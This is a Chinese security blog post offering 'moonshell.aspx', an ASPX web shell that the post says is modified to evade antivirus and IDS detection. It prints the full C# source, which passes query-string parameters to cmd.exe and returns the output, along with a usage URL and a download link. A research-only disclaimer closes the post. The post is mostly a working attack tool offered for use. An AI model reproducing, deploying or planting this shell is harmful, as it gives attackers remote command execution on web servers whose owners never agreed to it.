发个免杀修改的aspx提权马moonshell.aspx

暗月博客
暗月博客
暗月博客
809
文章
0
评论
2019年11月21日20:43:10评论973 views字数 2361阅读7分52秒阅读模式
摘要

发个免杀修改的aspx提权 马moonshell.aspx

用法 http://192.168.1.108/moonshell.aspx ?shell=C:/WINDOWS/system32/cmd.exe&sb=ipconfig

发个免杀修改的aspx提权moonshell.aspx 

<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%> <%@ import Namespace="System.IO"%> <%@ import Namespace="System.Diagnostics"%> <%@ import Namespace="System.Data"%> <%@ import Namespace="System.Management"%> <%@ import Namespace="System.Data.OleDb"%> <%@ import Namespace="Microsoft.Win32"%> <%@ import Namespace="System.Net.Sockets" %> <%@ import Namespace="System.Net" %> <%@ import Namespace="System.Web.UI"%> <%@ import Namespace="System.Runtime.InteropServices"%> <%@ import Namespace="System.DirectoryServices"%> <%@ import Namespace="System.ServiceProcess"%> <%@ import Namespace="System.Text.RegularExpressions"%> <%@ Import Namespace="System.Threading"%> <%@ Import Namespace="System.Data.SqlClient"%> <%@ import Namespace="Microsoft.VisualBasic"%> <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> <%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> <%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> <%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <script runat="server"> protected void Page_load(object sender,EventArgs e) {   string ok = Request.QueryString["sb"];   string shell= Request.QueryString["shell"];   //www.moonsec.com moon   Response.Write(shell + ok );   Response.Write("<pre>");   Response.Write(GetCmd(ok,shell));   Response.Write("</pre>"); }  private string GetCmd(string cmd,string shell) {   string ok = string.Empty;    Process p = new Process();             p.StartInfo.FileName = shell;             p.StartInfo.UseShellExecute = false;             p.StartInfo.RedirectStandardInput = true;             p.StartInfo.RedirectStandardOutput = true;             p.StartInfo.RedirectStandardError = true;             p.StartInfo.CreateNoWindow = true;             string strOutput = null;             try             {                 p.Start();                 p.StandardInput.WriteLine(cmd);     Response.Write(cmd);                 p.StandardInput.WriteLine("exit");                 ok = p.StandardOutput.ReadToEnd();                 p.WaitForExit();                 p.Close();              }             catch (Exception ex)              {      Response.Write("<pre>");      Response.Write(ex);      Response.Write("/<pre>");                  }   return ok; } </script> </head> <body> </body> </html>

绕过一些查询ids的。并且有调试信息输出,方便我们查看原因。

用法

http://192.168.1.108/moonshell.aspx?shell=C:/WINDOWS/system32/cmd.exe&sb=ipconfig

图:

发个免杀修改的aspx提权马moonshell.aspx

下载地址:

moonshell.zip

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日20:43:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   发个免杀修改的aspx提权马moonshell.aspxhttps://cn-sec.com/archives/72443.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息